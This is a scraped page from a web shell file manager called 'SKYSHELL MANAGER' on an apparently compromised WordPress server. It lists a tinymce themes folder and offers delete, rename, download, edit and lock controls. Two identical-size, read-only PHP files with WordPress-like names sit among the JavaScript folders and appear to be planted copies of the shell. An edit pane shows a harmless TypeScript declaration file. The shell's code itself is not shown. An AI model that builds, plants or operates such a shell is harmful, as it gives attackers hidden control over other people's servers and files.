📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: utils.d.ts
/// <reference types="node" /> import { SpawnSyncOptions } from 'child_process'; export declare function downloadUrl(url: string, file: string): Promise<void>; export declare function hash(filePath: string): Promise<string>; export declare function plusx(file: string): Promise<void>; export declare function spawn(command: string, args?: ReadonlyArray<string>, options?: SpawnSyncOptions): Promise<void>; //# sourceMappingURL=utils.d.ts.map
Save